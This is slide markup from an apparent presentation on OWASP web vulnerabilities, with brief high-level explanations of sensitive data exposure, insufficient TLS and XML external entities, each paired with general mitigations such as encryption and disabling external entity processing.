          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="6100" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Data Exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APIs, which allow developers to connect their application to third-party services like Google Maps, are great time-savers. However, some APIs rely on insecure data transmission methods, which attackers can exploit to gain access to usernames, passwords, and other sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data encryption, tokenization, proper key management, and disabling response caching can all help reduce the risk of sensitive data exposure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31628937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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SENSITIVE DATA EXPOSURE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{41F728EF-951C-4BAA-BD03-6E6796D9F298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324225" y="1109662"/>
            <a:ext cx="5543550" cy="4638675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27820972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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSUFFICIENT TLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6593431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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSUFFICIENT TLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4904FD65-DBC1-4611-B2A8-27A1BF223A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2696796" y="1578800"/>
            <a:ext cx="5280391" cy="2874137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322399392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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSUFFICIENT TLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{18677F88-2E34-49CB-91AE-45D87D5863F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3281362" y="857250"/>
            <a:ext cx="5629275" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42349305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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is security testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CD7DEAF8-217D-45D7-97ED-CE475A5F210F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="911352"/>
            <a:ext cx="7560945" cy="3832098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262477377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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML External Entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This risk occurs when attackers are able to upload or include hostile XML content due to insecure code, integrations, or dependencies. An SCA scan can find risks in third-party components with known vulnerabilities and will warn you about them. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disabling XML external entity processing also reduces the likelihood of an XML entity attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
